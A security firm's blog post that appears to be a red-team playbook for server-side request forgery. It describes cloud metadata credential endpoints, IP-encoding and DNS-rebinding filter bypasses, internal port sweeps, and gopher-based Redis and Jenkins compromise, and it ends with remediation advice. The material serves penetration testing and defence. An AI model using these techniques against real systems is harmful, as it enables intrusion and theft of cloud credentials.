BIPI
BIPI

SSRF Exploitation Playbook: Cloud Metadata, Internal Networks, and Filter Bypasses

Cloud Security

From IMDSv1 raids to IPv6 loopback tricks and DNS rebinding, the SSRF techniques that still own cloud workloads in 2024.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 16, 2024 · 12 min read

#ssrf#cloud-security#aws#pentesting#metadata

SSRF remains the highest leverage web bug in cloud environments. One unvalidated URL parameter can pivot from public marketing page to IAM credentials to full account takeover. The playbook below is what BIPI red teamers run on every engagement.

Finding SSRF Sinks

  • Image proxy and avatar fetch endpoints
  • PDF and HTML to image renderers (wkhtmltopdf, Puppeteer)
  • Webhook configuration and outbound integrations
  • URL preview features in chat and CMS apps
  • OAuth redirect_uri and OpenID discovery endpoints
  • XML and SVG parsers that follow external entities or hrefs

Cloud Metadata Targets

AWS IMDSv1 at the 169.254.169.254 link-local address still leaks role credentials on legacy EC2. GCP metadata requires a Metadata-Flavor Google header, and Azure needs Metadata true. Test all three on every engagement because hybrid deployments are common.

  1. AWS IAM security credentials path on the EC2 metadata service
  2. GCP service account token endpoint via metadata.google.internal
  3. Azure identity oauth2 token endpoint with api-version parameter
  4. Alibaba metadata service on the 100.100.100.200 address
  5. Kubernetes API server via the kubernetes.default.svc internal DNS

Filter Bypass Techniques

  • Decimal IP encoding that resolves to the metadata address
  • Hexadecimal IP encoding accepted by many HTTP clients
  • Octal with leading zeros to evade naive regex blocklists
  • IPv6 mapping of the IPv4 metadata address
  • DNS rebinding via services like rbndr.us or a custom NS record
  • URL parser confusion with embedded credentials and fragment markers

Internal Network Discovery

Once SSRF is confirmed, sweep RFC1918 ranges and common service ports. Redis on 6379, Elasticsearch on 9200, internal Jenkins on 8080, and Kubelet on 10250 are recurring wins. Use a timing oracle to enumerate live hosts even when responses are blocked.

Protocol Smuggling

gopher and dict schemes let you craft arbitrary TCP payloads. A gopher payload can POST to internal Redis and write an SSH key, or hit an unauthenticated Jenkins script console for RCE. PHP curl wrappers and Java URL handlers each support different protocol sets, so fingerprint the backend first.

SSRF is rarely just SSRF. It is the front door to whatever the server can reach, which in cloud is usually everything.

Blind SSRF Exfiltration

When responses are not returned, use Burp Collaborator or interact.sh as your callback. Time-based oracles also work: probe an internal port and measure connection latency against a known open and closed port baseline.

Remediation

  1. Enforce IMDSv2 with hop limit of 1 on all EC2 instances
  2. Egress allowlist at the VPC level, not just the application
  3. Resolve URLs server-side and validate against an IP allowlist after resolution
  4. Block link-local, loopback, and RFC1918 ranges in the HTTP client
  5. Use a dedicated egress proxy with allowlisted destinations for outbound fetches
CVE-2021-22214
GitLab SSRF to internal services, still relevant pattern
169.254.169.254
the address that funded a thousand bounties
1 hop
IMDSv2 hop limit that kills container SSRF

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.